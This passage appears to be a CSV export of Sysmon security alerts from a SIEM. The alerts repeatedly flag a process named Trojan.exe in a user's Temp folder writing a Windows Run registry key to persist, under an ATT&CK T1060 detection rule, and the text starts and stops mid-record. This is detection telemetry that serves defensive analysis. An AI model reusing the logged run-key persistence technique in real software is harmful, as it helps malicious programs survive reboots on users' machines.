HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:09.284"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:31.382",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:08.266 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:08.267672200Z"",""eventRecordID"":""1378"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:08.266\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:08.266"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.161",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:07.264 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:07.266088400Z"",""eventRecordID"":""1377"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:07.264\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:07.264"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.146",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:06.261 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:06.275309300Z"",""eventRecordID"":""1376"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:06.261\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:06.261"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:31.124",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:05.237 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:05.246812200Z"",""eventRecordID"":""1375"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:05.237\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:05.237"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.070",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:04.222 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:04.234653300Z"",""eventRecordID"":""1374"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:04.222\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:04.222"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:31.035",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:03.200 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:03.212351700Z"",""eventRecordID"":""1373"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:03.200\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:03.200"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:31.004",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:02.184 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:02.188503000Z"",""eventRecordID"":""1372"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:02.184\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:02.184"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.973",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:01.137 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:01.139344600Z"",""eventRecordID"":""1371"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:01.137\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:01.137"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.910",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:00.132 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:00.136984800Z"",""eventRecordID"":""1369"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:00.132\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:00.132"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:30.816",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:59.105 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:59.112914900Z"",""eventRecordID"":""1366"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:59.105\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:59.105"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.769",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:58.060 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:58.072285600Z"",""eventRecordID"":""1364"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:58.060\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
